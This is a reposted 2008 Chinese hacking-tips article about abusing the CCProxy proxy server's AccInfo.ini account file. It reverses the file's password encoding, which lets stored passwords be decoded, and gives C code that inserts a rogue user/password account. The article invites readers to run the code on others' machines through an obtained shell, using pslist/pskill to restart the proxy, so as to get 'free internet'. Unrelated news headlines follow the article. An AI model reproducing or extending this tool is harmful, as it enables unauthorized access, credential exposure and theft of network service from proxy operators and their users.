分享
 
 
 

黑客小技巧,用CCproxy漏洞实现免费上网

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!

大家都知道ccproxy这个小软件吧!这个软件在我们学校比较流行,用代理的,基本上都是这个,呵呵,估计大家所在的学校和小区的局域网也是一样吧!那今天就让我给大家介绍这个软件:

大家打开ccproxy的目录,只要大家以前配置个帐户,那么在其下面就会有个AccInfo.ini的文件,这个就是帐户配置文件,现在给大家分析一下:

首先让大家看看一个典型的AccInfo.ini文件,代码如下:

[System]

UserCount=3

-----------这里是帐户的个数

AuthModel=1

----------1代表允许部分

AuthType=2

---------允许的连接模式的个数

TimeScheduleCount=0

WebFilterCount=0

[User001]

UserName=User-001

Password=

MACAddress=

IPAddressLow=219.216.100.1

IPAddressHigh=219.216.100.1

ServiceMask=254

MaxConn=-1

BandWidth=-1

WebFilter=-1

TimeSchedule=-1

EnableUserPassword=0

EnableIPAddress=1

EnableMACAddress=0

[User002]

UserName=User-001

Password=898884883

MACAddress=

IPAddressLow=0.0.0.0

IPAddressHigh=0.0.0.0

ServiceMask=254

MaxConn=-1

BandWidth=-1

WebFilter=-1

TimeSchedule=-1

EnableUserPassword=1

EnableIPAddress=0

EnableMACAddress=0

大家看到上面注释的部分了吗?

我要修改的也是这个地方!先来解释这个[AuthType=2

----的接模式的个数]这里假如你的CCPROXY只用一种验证模式,那么它就是1,假如你还有其他验证模式,比如用户/密码,MAC地址,...,的话那么Auth Type就会变化使等他的数字与你的验证模式种类数相同!

经过我做实验知道,只要我们修改:UserCount=3 AuthModel=1 AuthType=2这三个地方,还有在下面在添加一些代码,那么重起CCPROXY后,帐户就会添加成功了!但是大家要注意到这些地方,想[User-00x]的地方,有多少个用户,[User-00x]中的x就是多少,否则将会失败!还有就是假如我们添加代码成功后,必须重启动CCPROXY,我们添加的帐户才会生效!

好了现在我们来添加代码,我们要在CCPROXY里新增一个新的用户,那么我们就可以在后添加上如下代码:

[User00x]

UserName=User-001

Password=898884883

MACAddress=

IPAddressLow=0.0.0.0

IPAddressHigh=0.0.0.0

ServiceMask=254

MaxConn=-1

BandWidth=-1

WebFilter=-1

TimeSchedule=-1

EnableUserPassword=1

EnableIPAddress=0

EnableMACAddress=0

这段代码是什么意思呢?EnableUserPassword=1-----表示以用户/密码的验证模式;

EnableIPAddress=0----------0表示不是这种模式,也就是不是IP地址验证模式;

EnableMACAddress=0----------0表示不是这种模式,也就是不是MAC地址验证;当然还有很多种,我就不一一介绍了!

UserName=User-001----------------用户名!

Password=898884883----------------密码!

那898 884 883表示什么呢?它表示的就是est!

我现在列举一些例子:

1------950

2------949

9------942

a------902

A------934

a ------902

b ------901

c ------900

d ------899

z ------877

大家看到这些应该知道了吧!950代表1,949代表2,依次递减!

902代表a,901代表b,依次递减,大写的字母比小写字母大32;

现在你就知道898884883代表的是est了吧!呵呵,大家也可以自己配置!

好了说到这里,我们的发现的介绍也就基本完了!

那么我们如果程序来添加一个新的帐户呢?(下面是我自己写的C代码,代码都没有进行任何的优化,希望大家不要笑)

#include

main()

{int c=0,user,model,i;

FILE*fp;

clrscr();

fp=fopen("AccInfo.ini","r+");

while(c!=44)

{getc(fp);

c++;

if(c==19){ user=getc(fp);

printf("\nthe total user is:%c\n",user);

}

if(c==41){ model=getc(fp);

printf("\nthe curent model is:%c\n",model);

}

}

fseek(fp,20,0);

putc(++user,fp);

fseek(fp,45,0);

putc(++model,fp);

fclose(fp);

fp=fopen("AccInfo.ini","r");

c=0;

while(c!=44)

{putchar(getc(fp));

c++;

}

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("[User004]\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("UserName=User-001\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("Password=898884883\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("MACAddress=\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("IPAddressLow=0.0.0.0\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("IPAddressHigh=0.0.0.0\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("ServiceMask=254\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("MaxConn=-1\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("BandWidth=-1\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("WebFilter=-1\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("TimeSchedule=-1\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("EnableUserPassword=1\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("EnableIPAddress=0\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,0,2);

fputs("EnableMACAddress=0\n",fp);

fclose(fp);

fp=fopen("AccInfo.ini","r+");

fseek(fp,-237L,2);

putc(user,fp);

fclose(fp);

}

用TC或者VC都能编译出来!

编译出来后大家可以放到CCPROXY的目录下运行,看看是不是多了个新的帐户!验证形式:用户/密码

用户名:User-001

密码 :est

其实作者本来设想的这个小东西应该具有如下功能的:

搜索系统进程中是否有CCPRXOY,如果没有提示错误!

并搜索CCPROXY所在的目录,

杀死Ccproxy

添加帐户;

在重起CCproxy

但是现在作者只写出了添加帐户的代码,其他的没时间去写了!大家可以自己发挥!剩余的代码,实现免费上网已经不是什么难题了!

其实,大家想玩的话,不用我告诉你方法你都知道,只要大家拿到对方的一个shell上传到对方的 CCPOXY目录运行,结和pslist.exe和pskill.exe,也能先来玩玩!

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有